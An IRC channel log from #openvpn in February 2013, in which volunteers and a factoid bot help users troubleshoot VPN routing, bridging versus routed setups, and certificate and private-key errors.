17:56 < pekster> !redirect
17:56 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
17:56 <@vpnHelper> http://ircpimps.org/redirect.png
17:57 < neilhwatson> Yes, I have that bookmarked.
17:57 < pekster> It's not super-hard to turn your setup into a tap (bridged) setup
17:58 < neilhwatson> I prefer to avoid NAT. NAT is always off-putting.
17:58 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has quit [Quit: Leaving, Ya'LL!]
17:58 < pekster> However, that would require removing the addressing from the server-side, and you'd need to set up the bridge manually since the primary server IP needs to go on the bridge interface, *not* the physical interface.
Both tap0 (or w/e you call your tap device) and your physical NIC need to go into the bridge
17:58 -!- sw0rdfish [sw0rdfish@fr2.v6.nightmare.panicbnc.eu] has joined #openvpn
17:58 -!- sw0rdfish [sw0rdfish@fr2.v6.nightmare.panicbnc.eu] has quit [Changing host]
17:58 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn
17:59 < pekster> Then you simply connect the client to the VPN and give it an IP like you would any other interface, and it joins the server just like a network switch (bridged is basically a "virtual switch" for Ethernet links)
18:00 < pekster> Ah, we have a factoid for that too:
18:00 < pekster> !bridge
18:00 <@vpnHelper> "bridge" is (#1) http://openvpn.net/index.php/documentation/miscellaneous/ethernet-bridging.html for the doc or (#2) http://openvpn.net/index.php/documentation/faq.html#bridge1 for info from the FAQ or (#3) also see !tunortap and !layer2 and read --server-bridge in the manual (!man) or (#4) also see !whybridge
18:02 -!- raidz is now known as raidz_away
18:05 < pekster> Anyway, I'm out for a bit. Good luck - you're closer than you think, you just need to fix the routed vs bridged problem you have
18:06 < pekster> (oh, and if you bridge, you don't set your gateway to 10.0.0.1, since that address becomes meaningless - the server won't have a "separate" VPN IP if you bridge, and your client will use whatever your ISP's router is as its gateway.)
18:07 < neilhwatson> Right, it's a lower level. Thanks for the tips. I'll probably sleep on it.
18:11 -!- JSharpe [~JSharpe@188.227.181.234] has quit [Quit: Leaving]
18:15 < JesseC> When you set up an openvpn server, is it possible to assign an address to the server that's in the same subnet as the dhcp addresses handed out to the clients?
18:15 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer]
18:16 < JesseC> ie, you connect to the server via the public ip, but once on the vpn you can ssh into it using an internal vpn ip
18:17 -!- BtbN [~btbn@btbn.de] has left #openvpn ["Verlassend"]
18:27 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux]
18:37 -!- erry_ [erry@freenode/staff/erry] has joined #openvpn
18:42 -!- erry [erry@freenode/staff/erry] has quit [Ping timeout: 624 seconds]
18:58 -!- leg3nd [~leg3nd@unaffiliated/leg3nd] has joined #openvpn
18:58 < leg3nd> hey pekster, just wanted to let you know the issue was indeed with the virtual adapter - I changed it to a different type in ESXi and the VPN works as intended. Thank you for your help.
19:04 -!- leg3nd [~leg3nd@unaffiliated/leg3nd] has quit [Ping timeout: 260 seconds]
19:13 -!- neilhwatson [~neilhwats@cl-274.chi-03.us.sixxs.net] has quit [Quit: Leaving.]
19:15 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn
19:16 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn
19:29 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit []
19:34 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 256 seconds]
19:34 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 256 seconds]
19:40 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit []
20:25 -!- _mnathani_ [~mnathani@198-84-231-11.cpe.teksavvy.com] has quit [Read error: Connection reset by peer]
20:39 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
20:46 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn
21:01 -!- mirco_ [~mirco@p50805CBE.dip.t-dialin.net] has joined #openvpn
21:03 -!- uberushaximus [~uberushax@hacked.thegov.us] has quit [Ping timeout: 252 seconds]
21:04 -!- uberushaximus
[~uberushax@hacked.thegov.us] has joined #openvpn
21:04 -!- mirco [~mirco@p50806731.dip.t-dialin.net] has quit [Ping timeout: 264 seconds]
21:04 -!- mirco_ is now known as mirco
21:07 -!- mirco [~mirco@p50805CBE.dip.t-dialin.net] has quit [Quit: mirco]
21:17 < DougEFresh> openvpn and pfsense and fw rules are making me lose my mind
21:28 -!- nonotza [~nonotza@cpe-74-73-224-62.nyc.res.rr.com] has joined #openvpn
21:33 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
21:49 -!- nonotza [~nonotza@cpe-74-73-224-62.nyc.res.rr.com] has quit [Quit: nonotza]
22:27 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has joined #openvpn
22:28 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has quit [Read error: Connection reset by peer]
22:40 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
22:43 -!- hazardous [~dbn@void.kassad.in] has quit [Changing host]
22:43 -!- hazardous [~dbn@openvpn/user/hazardous] has joined #openvpn
22:43 -!- mode/#openvpn [+v hazardous] by ChanServ
23:00 -!- Devastator- [~devas@186.214.110.17] has joined #openvpn
23:01 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 244 seconds]
23:03 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
23:05 -!- raidz_away [~raidz@openvpn/corp/admin/andrew] has quit [Ping timeout: 245 seconds]
23:09 -!- mattock_afk [~mattock@openvpn/corp/admin/mattock] has quit [Ping timeout: 256 seconds]
23:17 -!- mattock_afk [~mattock@raidz.im] has joined #openvpn
23:18 -!- mattock_afk is now known as mattock
23:18 -!- mattock [~mattock@raidz.im] has quit [Changing host]
23:18 -!- mattock [~mattock@openvpn/corp/admin/mattock] has joined #openvpn
23:18 -!- mode/#openvpn [+o mattock] by ChanServ
23:18 -!- raidz_away [~raidz@raidz.im] has joined #openvpn
23:18 -!- raidz_away is now known as raidz
23:18 -!- raidz [~raidz@raidz.im] has quit [Changing host]
23:18 -!- raidz
[~raidz@openvpn/corp/admin/andrew] has joined #openvpn
23:18 -!- mode/#openvpn [+o raidz] by ChanServ
23:20 -!- p3rror [~mezgani@41.249.81.68] has quit [Ping timeout: 264 seconds]
23:54 -!- odoacre_ is now known as odoacre
23:54 -!- nickmoeck [~nickmoeck@205.185.118.253] has joined #openvpn
23:58 -!- baobeiiii [~baobeiiii@180.155.14.35] has quit [Read error: Connection reset by peer]
23:58 -!- baobeiiii [~baobeiiii@192.73.244.224] has joined #openvpn
--- Day changed Fri Feb 22 2013
00:12 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
00:14 -!- xkernel_ [~xkernel@gateway/tor-sasl/xkernel] has joined #openvpn
00:14 < xkernel_> what will happen if I don't specify MTU in the server and client conf?
00:17 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has quit []
00:24 -!- nutron [~nutron@unaffiliated/nutron] has quit [Remote host closed the connection]
00:31 -!- xkernel_ [~xkernel@gateway/tor-sasl/xkernel] has quit [Ping timeout: 276 seconds]
00:37 -!- xkernel_ [~xkernel@gateway/tor-sasl/xkernel] has joined #openvpn
00:38 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn
00:47 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn
00:53 -!- xkernel_ [~xkernel@gateway/tor-sasl/xkernel] has quit [Ping timeout: 276 seconds]
00:55 -!- xkernel_ [~xkernel@gateway/tor-sasl/xkernel] has joined #openvpn
00:56 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has quit []
01:00 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn
01:01 -!- xkernel_ [~xkernel@gateway/tor-sasl/xkernel] has quit [Ping timeout: 276 seconds]
01:03 -!- baobeiiii_ [~baobeiiii@180.155.14.35] has joined #openvpn
01:06 -!- baobeiiii [~baobeiiii@192.73.244.224] has quit [Ping timeout: 245 seconds]
01:22 -!- baobeiiii__ [~baobeiiii@180.155.14.35] has joined #openvpn
01:22 -!- baobeiiii_ [~baobeiiii@180.155.14.35] has quit [Read error: Connection reset by peer]
01:39 -!- Teck7__
[~teck7@69.157.154.143] has joined #openvpn
01:40 -!- Teck7 [~teck7@76.65.60.225] has quit [Read error: Connection reset by peer]
02:05 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
02:05 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
02:05 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
02:05 -!- mode/#openvpn [+o krzee] by ChanServ
02:16 -!- Devastator- [~devas@186.214.110.17] has quit [Read error: Connection reset by peer]
02:16 -!- Devastator [~devas@186.214.110.17] has joined #openvpn
02:17 -!- mikeybs [~michael@cpe-67-248-128-94.nycap.res.rr.com] has joined #openvpn
02:18 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer]
02:20 < mikeybs> I'm trying to get access to the LAN behind the server from the client, right now when I connect I can ping the server by its LAN IP, but I can not ping anything else on the server LAN, running on arch linux, I have packet forwarding enabled, and I have the NIC in promiscuous mode
02:22 -!- baobeiiii__ [~baobeiiii@180.155.14.35] has quit [Quit: Leaving]
02:25 < odoacre> !obfsproxy
02:25 <@vpnHelper> "obfsproxy" is (#1) For a writeup on using obfsproxy with OpenVPN see https://syria.hacktivist.me/?p=148 or (#2) See also !obfs. The link to TrafficObfuscation also contains a setup example
02:27 <@krzee> mikeybs,
02:27 <@krzee> !route_outside_ovpn
02:27 <@vpnHelper> "route_outside_ovpn" is "route_outside_openvpn" is (#1) If your server is not the default gateway for the LAN, you will need to add routes to your gateway.
See ROUTES TO ADD OUTSIDE OPENVPN in !route or (#2) Here are 2 diagrams that explain how this works: http://www.secure-computing.net/wiki/index.php/Graph http://i.imgur.com/BM9r1.png
02:28 < mikeybs> yup, thanks, I am just finding it on my own as well :)
02:28 < mikeybs> I had found it earlier, but it didn't make sense to me, then another forum post did
02:28 < mikeybs> but thanks for helping, appreciate it!
02:29 <@krzee> yw
02:34 < mikeybs> hmm, now I can ping the router on the server LAN, but none of the other hosts on the server LAN except the server itself
02:36 < mikeybs> I have an openbsd router on the server side
02:36 < mikeybs> did this on it
02:36 < mikeybs> route add -net 10.8.0.0/24 192.168.0.115
02:36 < mikeybs> add net 10.8.0.0/24: gateway 192.168.0.115
02:37 < mikeybs> seems like it worked cause I can now ping the openbsd router itself
02:39 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn
02:50 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn
03:06 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn
03:08 -!- mirco_ [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn
03:11 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Ping timeout: 244 seconds]
03:11 -!- mirco_ is now known as mirco
03:13 -!- sitaktif [~sitaktif@kollok.org] has quit [Quit: The Screen is dead, long live the screen!]
03:24 -!- sitaktif [~sitaktif@kollok.org] has joined #openvpn
03:49 -!- brute11k1 [~brute11k@89.249.235.210] has joined #openvpn
03:50 -!- brute11k [~brute11k@89.249.235.210] has quit [Ping timeout: 252 seconds]
04:40 -!- erry_ is now known as erry
04:51 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn
04:52 -!- Devastator [~devas@186.214.110.17] has quit [Changing host]
04:52 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn
04:57 -!- JSharpe [~JSharpe@10-253-3-31-anc.floodtel.net] has joined #openvpn
05:01 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Ping timeout: 252 seconds]
06:09 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
06:44 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 240 seconds]
06:48 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
07:04 -!- master_of_master [~master_of@87.181.77.103] has quit [Ping timeout: 252 seconds]
07:06 -!- master_of_master [~master_of@p57B55327.dip.t-dialin.net] has joined #openvpn
07:10 -!- p3rror [~mezgani@41.249.146.72] has joined #openvpn
07:17 < surfmasta> when i kill openvpn and restart < 1-2 seconds it gets old data pushed to the client, when i wait a little then not, is there a switch so that the openvpn always tries to pull new configuration?
07:25 -!- Teck7__ is now known as rfxn
07:43 < defswork> I'm getting bad source address from client for the internet facing IP address of the client
07:44 < defswork> routing muck up somehow ?
07:44 < defswork> or SNATting stuff it shouldn't
07:44 -!- mattock is now known as mattock_afk
07:48 < defswork> SNAT 0 -- 192.168.15.0/24 0.0.0.0/0 to:93.12.11.145
07:48 < defswork> that won't do much good
07:49 < defswork> hmm specific to eth1 only so should be ok
08:05 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn
08:16 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
08:29 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Remote host closed the connection]
08:29 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn
08:43 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn
09:20 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn
09:20 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn
09:25 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer]
09:35 -!- p3rror [~mezgani@41.249.146.72] has quit [Read error: Operation timed out]
09:35 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 264 seconds]
09:35 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 264 seconds]
09:35 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Quit: mirco]
09:36 -!- samba35 [~shrikant@unaffiliated/samba35] has joined #openvpn
09:38 -!- samba35 [~shrikant@unaffiliated/samba35] has quit [Client Quit]
09:44 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn
09:46 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn
09:46 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn
09:56 < dpecka> stupid Q: .. one of the keys is bad obviously ..
how can I print out the ca for a given client.crt ?
09:56 < pekster> You can get the Issuer fields (and all other x509 fields in any cert) by doing: openssl x509 -in file.crt -noout -text
09:56 < pekster> I think that's what you wanted, right? You want to see "which" CA signed that particular cert?
09:56 < dpecka> thanks
09:57 < dpecka> exactly
09:57 -!- odoacre [~antonio@us.happylatte.com] has quit [Ping timeout: 256 seconds]
09:57 -!- odoacre [~antonio@us.happylatte.com] has joined #openvpn
09:58 < pekster> Yup, that's it then. Pay attention to the 'X509v3 Authority Key Identifier' as the issuer Subject DN is just text that could in theory match anyone's CA who used that as the "name" of the CA
09:58 -!- Kalavera [~Kalavera@aquiles.novelix.com.pe] has joined #openvpn
10:00 < Kalavera> greetings guys, for some reason my vpn has stopped working, I can ping the tun0 interface of the vpn server, also the ethernet interface that looks to the lan, but can reach it from the client server
10:00 < dpecka> pekster: it seems the same .. wt* ..
client on windows spits out this:
10:00 < dpecka> Fri Feb 22 16:56:59 2013 Cannot load private key file C:\Program Files (x86)\OpenVPN\config\zkorinek.key: error:0906D06C:PEM routines:PEM_read_bio:no start line: error:140B0009:SSL routines:SSL_CTX_use_PrivateKey_file:PEM lib
10:00 < dpecka> Fri Feb 22 16:56:59 2013 Error: private key password verification failed
10:01 < dpecka> pekster: i compared that to client.crt which works
10:01 < pekster> Wrong password for the private key it seems
10:01 < dpecka> there's no password protecting the key
10:01 < pekster> Oh, it can't find the key is why
10:02 < pekster> "Cannot load private key file"
10:02 < pekster> Post your config on the client; it's probably either not where you expect it to be, or the path isn't quoted/escaped properly
10:02 < pekster> You need something like: key "C:\\some where\\file.key"
10:03 < pekster> quoted (for the spaces) and escaped (for the path separator)
10:04 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 255 seconds]
10:04 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 255 seconds]
10:04 < dpecka> pekster: path is fine .. i have the same setup for more clients which work ..
i think there's some problem with the cert
10:06 < pekster> !factoids search verify
10:06 <@vpnHelper> "certverify" is (#1) verify your certs are signed correctly by running `openssl verify -CAfile ` for client.crt and server.crt or (#2) also make sure you use the same ca.crt on both sides by checking their md5
10:06 < pekster> dpecka: See #1 there
10:07 < pekster> Now, it's possible the cert doesn't match the private key (the cert contains the "public" part of the keypair, plus the CA's signature on top of it marking it as "trusted" when the server checks it against its own copy of the ca.crt
10:07 < pekster> In that case you'd need to re-create a keypair and have the CA sign it
10:08 < pekster> (you can either create a new request from the private key, or better might just be to re-issue the keypair if you use easy-rsa or something since it won't support "out of the box" doing a CSR from a private key
10:09 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
10:11 < dpecka> pekster: thanks .. i generated a new key and it works ..
10:22 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
10:33 -!- Kalavera [~Kalavera@aquiles.novelix.com.pe] has left #openvpn []
10:42 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Quit: Ex-Chat]
11:07 -!- surfmasta [~bart@80.92.88.10] has quit [Quit: Leaving]
11:08 -!- jthunder [~jthunder@174.3.126.51] has quit [Ping timeout: 264 seconds]
11:10 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn
11:13 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds]
11:20 -!- JesseC [~JesseCWor@wsip-98-175-20-126.br.br.cox.net] has quit [Ping timeout: 244 seconds]
11:32 -!- dazo_afk is now known as dazo
11:48 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
12:02 < JackSparrow> if i have two servers (using 10.0.1.0/24 and 10.0.2.0/24), how can i connect clients from the first server to clients from the second server ?
12:05 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
12:07 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
12:12 < pekster> JackSparrow: First you need a functional setup you can ping across (VPN server IP <--> VPN client IP.)
Then, follow each of these guides/flowcharts to get access to each LAN:
12:12 < pekster> !serverlan
12:12 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png
12:12 < pekster> !clientlan
12:12 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route
12:12 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png
12:13 < JackSparrow> pekster: thank you!
12:20 -!- Vorik [~quassel@D97950AD.cm-3-2b.dynamic.ziggo.nl] has quit [Read error: Connection reset by peer]
12:28 -!- zhvtar [~zhvtar@unaffiliated/zhvtar] has joined #openvpn
12:38 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
12:41 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Ping timeout: 252 seconds]
12:48 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
13:00 -!- EugeneKay [eugene@madeitwor.se] has quit [Remote host closed the connection]
13:00 -!- spitf1r3 [~quassel@89.200.144.70] has joined #openvpn
13:03 -!- EugeneKay [eugene@madeitwor.se] has joined #openvpn
13:05 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 264 seconds]
13:32 -!- defsdoor [~andy@cpc30-sutt4-2-0-cust155.19-1.cable.virginmedia.com] has joined #openvpn
13:33 -!- defsdoor [~andy@cpc30-sutt4-2-0-cust155.19-1.cable.virginmedia.com] has quit [Client Quit]
13:54 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Quit: Leaving]
14:22 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn
14:46 -!- md_5 [md_5@mcdevs/trusted/md-5] has quit [Ping timeout: 252 seconds]
14:51 -!- k1ng [~k1ng@unaffiliated/k1ng] has left #openvpn ["Leaving"]
14:52 -!- md_5 [md_5@mcdevs/trusted/md-5] has joined #openvpn
14:54 -!- dazo is now known as dazo_afk
15:08 -!- Orbi [~opera@109.129.1.224] has joined #openvpn
15:08 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
15:11 -!- pcdummy [~quassel@unaffiliated/pcdummy] has joined #openvpn
15:12 -!- brute11k [~brute11k@89.249.235.210] has joined #openvpn
15:12 < pcdummy> hi, i followed the following howto to build a VPN to my KVM libvirt Network, but i can't ping through it, someone here wanna help me with it?
15:12 < pcdummy> http://deathegg.student.utwente.nl/wiki/Knowledge:OpenVPN#Bridging_OpenVPN_.28Server.29
15:12 <@vpnHelper> Title: Knowledge:OpenVPN - Death Egg (at deathegg.student.utwente.nl)
15:13 < pcdummy> It seems like a routing/NAT problem, but i'm at the end of my knowledge.
15:13 -!- brute11k1 [~brute11k@89.249.235.210] has quit [Ping timeout: 255 seconds]
15:13 < pcdummy> I get a lot of these lines on the server: Feb 22 22:07:14 srvvm1 ovpn-server[25554]: rkistl/213.163.240.86:11603 MULTI: Learn: 40:00:40:06:b0:b7 -> rkistl/213.163.240.86:11603
15:14 < pcdummy> rkistl is my VPN key and its my current public ip.
15:16 < pcdummy> http://pastie.org/6318814 <-- my current iptables output
15:18 < pcdummy> http://pastie.org/6318827 <-- seems like i need another Forward rule?
15:19 < zhvtar> pcdummy: is this behind nat router? if so, may need to set up route info
15:19 < pcdummy> zhvtar: it isn't.
15:20 < pekster> pcdummy: What's the end-goal here?
15:20 < pcdummy> zhvtar: the problem is the kvm virbr2, it's bridging i think.
15:20 < pcdummy> pekster: i want a direct network with the kvm machines on the host.
15:20 < pekster> What is a "direct network"
15:20 < zhvtar> haven't done bridging yet. sorry i can't help.
15:21 < pcdummy> pekster: same ip, same UDP
15:21 < pekster> huh? You can't have 2 machines with the same IP
15:21 < pcdummy> broadcast and so on
15:21 < pcdummy> pekster: same network
15:22 < pekster> What's the purpose though? If you just want IP connectivity (including UDP) then you don't need bridging at all
15:22 < pekster> !tunortap
15:22 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you
15:22 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun.
15:22 < pekster> If you need something besides IP/TCP/UDP you should clarify
15:22 < pekster> !goal
15:22 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc
15:25 < pcdummy> pekster: ok, ... i go back to the easy setup.
15:30 -!- Makenai [~Makenai@78.129.218.107] has joined #openvpn
15:30 < Makenai> !welcome
15:30 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum
15:31 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
15:31 < Makenai> !route
15:31 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide
15:38 < pekster> !learn route as See !serverlan or !clientlan for steps and troubleshooting flowcharts for LANs behind the server or client
15:38 <@vpnHelper> Joo got it.
15:42 -!- Makenai [~Makenai@78.129.218.107] has quit [Ping timeout: 248 seconds]
15:46 -!- Makenai [~Makenai@78.129.218.107] has joined #openvpn
15:47 < zhvtar> !serverlan
15:47 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png
16:01 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
16:04 -!- Alberts00 [~Makenai@91.105.79.97] has joined #openvpn
16:06 -!- Makenai [~Makenai@78.129.218.107] has quit [Ping timeout: 255 seconds]
16:16 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Read error: Operation timed out]
16:23 -!- Makenai [~Makenai@beaver.feralhosting.com] has joined #openvpn
16:24 -!- Alberts00 [~Makenai@91.105.79.97] has quit [Ping timeout: 252 seconds]
16:24 -!- Alberts00 [~Makenai@78.129.218.107] has joined #openvpn
16:27 -!- zhvtar is now known as abowman
16:27 -!- abowman [~zhvtar@unaffiliated/zhvtar] has quit [Excess Flood]
16:27 -!- zhvtar [~zhvtar@198.23.139.102] has joined #openvpn
16:27 -!- zhvtar [~zhvtar@198.23.139.102] has quit [Changing host]
16:27 -!- zhvtar [~zhvtar@unaffiliated/zhvtar] has joined #openvpn
16:27 -!- zhvtar [~zhvtar@unaffiliated/zhvtar] has quit [Excess Flood]
16:27 -!- zhvtar [~zhvtar@198.23.139.102] has joined #openvpn
16:27 -!- zhvtar [~zhvtar@198.23.139.102] has quit [Excess Flood]
16:27 -!- zhvtar [~zhvtar@198.23.139.102] has joined #openvpn
16:27 -!- zhvtar [~zhvtar@198.23.139.102] has quit [Changing host]
16:27 -!- zhvtar [~zhvtar@unaffiliated/zhvtar] has joined #openvpn
16:27 -!- zhvtar [~zhvtar@unaffiliated/zhvtar] has quit [Excess Flood]
16:27 -!- zhvtar [~zhvtar@198.23.139.102] has joined #openvpn
16:27 -!- zhvtar
[~zhvtar@198.23.139.102] has quit [Changing host]
16:27 -!- zhvtar [~zhvtar@unaffiliated/zhvtar] has joined #openvpn
16:27 -!- zhvtar [~zhvtar@unaffiliated/zhvtar] has quit [Excess Flood]
16:27 -!- zhvtar [~zhvtar@198.23.139.102] has joined #openvpn
16:27 -!- zhvtar [~zhvtar@198.23.139.102] has quit [Changing host]
16:27 -!- zhvtar [~zhvtar@unaffiliated/zhvtar] has joined #openvpn
16:28 -!- Makenai [~Makenai@beaver.feralhosting.com] has quit [Ping timeout: 260 seconds]
16:29 -!- Alberts00 [~Makenai@78.129.218.107] has quit [Ping timeout: 246 seconds]
16:35 -!- Orbi [~opera@109.129.1.224] has left #openvpn []
16:41 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn
16:44 < mikeybs> so I'm guessing my problem has something to do with my router configuration on my server lan, but I'm not sure what the issue is....
16:45 < mikeybs> I can ping from VPN client to VPN server both the server VPN IP as well as the server LAN IP
16:45 < mikeybs> I can also ping the LAN router from the VPN client
16:46 < mikeybs> but I can not ping any other hosts on the LAN
16:46 < mikeybs> I've added a route to the router for the VPN
16:47 < mikeybs> 10.8.0/24 192.168.0.115
16:48 < mikeybs> all of that refers to the server LAN, I am not concerned with the client LAN, at least not yet... lol
16:49 < mikeybs> server LAN access from the client is the biggest requirement
16:51 < mikeybs> can anyone confirm that this scenario is conclusively a misconfigured server LAN router?
16:51 < mikeybs> I am running an openbsd router, but I am not an expert with it, I just use it for a basic NAT router with some port forwarding to the internal network
16:53 -!- hg_5_ [~chatzilla@91.234.245.245] has joined #openvpn
16:53 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 256 seconds]
16:54 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Ping timeout: 260 seconds]
